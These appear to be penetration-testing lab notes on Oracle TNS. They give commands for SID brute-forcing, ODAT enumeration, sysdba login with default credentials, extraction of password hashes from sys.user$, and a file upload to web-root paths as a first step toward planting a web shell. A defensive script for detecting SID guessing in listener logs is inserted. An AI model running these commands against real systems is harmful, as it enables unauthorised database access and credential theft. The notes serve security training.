Oracle TNS
Table of Contents
- ODAT (Oracle Database Attacking Tool)
- SID Bruteforcing
- Use SQLplus to Interact with the Oracle Database
- Oracle Transparent Network Substrate General Information
Default port: TCP/1521
nmap -> sudo nmap -p1521 -sV 10.129.204.235 --open
The Oracle DBSNMP service default password - dbsnmp
setup oracle tools -> /payload_executable/Oracle-Tools-setup.sh
ODAT (Oracle Database Attacking Tool)
> ./odat/odat.py -h
- retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations, etc
> ./odat/odat.py all -s 10.129.204.235
SID Bruteforcing
- System Identifier (SID) is a unique identifier of a database instance in Oracle RDBMS; the client uses this SID to identify which database instance to connect to
- If the SID is not specified, the default value defined in the tnsnames.ora file is used
nmap SID bruteforcing -> sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
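Seen from the listener side, SID guessing like this shows up in listener.log as a run of rejected connects. The following is an added example, not part of the original notes: it flags clients that request several different unknown SIDs, assuming the standard listener.log audit-trail layout; the sample lines, addresses and the threshold are constructed.

```python
import re
from collections import defaultdict

# Constructed sample lines in the listener.log audit-trail layout:
# TIMESTAMP * CONNECT DATA * PROTOCOL INFO * EVENT * SID/SERVICE * RETURN CODE
SAMPLE_LOG = """\
07-MAR-2023 10:15:30 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=40112)) * establish * XE * 0
07-MAR-2023 10:15:31 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=c)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=51001)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
07-MAR-2023 10:15:32 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=c)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=51002)) * establish * PROD * 12505
07-MAR-2023 10:15:33 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=c)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=51003)) * establish * TEST * 12505
07-MAR-2023 10:16:02 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.0.2.10)(PORT=40120)) * establish * XEE * 12505
07-MAR-2023 10:16:05 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=c)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=198.51.100.7)(PORT=51004)) * establish * XE * 0
"""

# Pull the client address, requested SID/service and return code from an
# "establish" entry; continuation lines such as "TNS-12505: ..." do not match.
ENTRY = re.compile(
    r"\(ADDRESS=\(PROTOCOL=tcp\)\(HOST=(?P<ip>[^)]+)\)\(PORT=\d+\)\)"
    r" \* establish \* (?P<sid>\S+) \* (?P<rc>\d+)\s*$",
    re.IGNORECASE,
)
UNKNOWN = {"12505", "12514"}  # TNS-12505 unknown SID, TNS-12514 unknown service


def sid_guessers(log_text, min_distinct=3):
    """Return {client_ip: sorted rejected names} for clients that requested at
    least min_distinct different unknown SIDs/service names.
    min_distinct is an assumed threshold; tune it to the environment."""
    rejected = defaultdict(set)
    for line in log_text.splitlines():
        m = ENTRY.search(line)
        if m and m["rc"] in UNKNOWN:
            rejected[m["ip"]].add(m["sid"].upper())
    return {ip: sorted(s) for ip, s in rejected.items() if len(s) >= min_distinct}


if __name__ == "__main__":
    print(sid_guessers(SAMPLE_LOG))
```

Counting distinct rejected names rather than raw failures keeps a single mistyped SID from a legitimate client (192.0.2.10 in the sample) below the threshold.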
Use SQLplus to Interact with the Oracle Database
> sqlplus username/password@ip/SID
If you come across the error "sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory", execute the following:
> sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
list all tables
SQL> select table_name from all_tables;
attempt to log in as system database admin
> sqlplus scott/tiger@10.129.204.235/XE as sysdba
extract password hashes
SQL> select name, password from sys.user$;
upload web shell in default paths if a web server is present
OS | Path |
---|---|
Linux | /var/www/html |
Windows | C:\inetpub\wwwroot |
To be safe and evade IDS/IPS, see if you can upload a text file:
> echo "Oracle File Upload Test" > testing.txt
> ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
[1] (10.129.204.235:1521): Put the ./testing.txt local file in the C:\inetpub\wwwroot folder like testing.txt on the 10.129.204.235 server
[+] The ./testing.txt file was created on the C:\inetpub\wwwroot directory on the 10.129.204.235 server like the testing.txt file
use curl to make sure
> curl -X GET http://10.129.204.235/testing.txt
Oracle Transparent Network Substrate General Information
- facilitates communication between Oracle databases and applications
- The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the $ORACLE_HOME/network/admin directory. The plain text file contains configuration information for Oracle database instances and other network services that use the TNS protocol.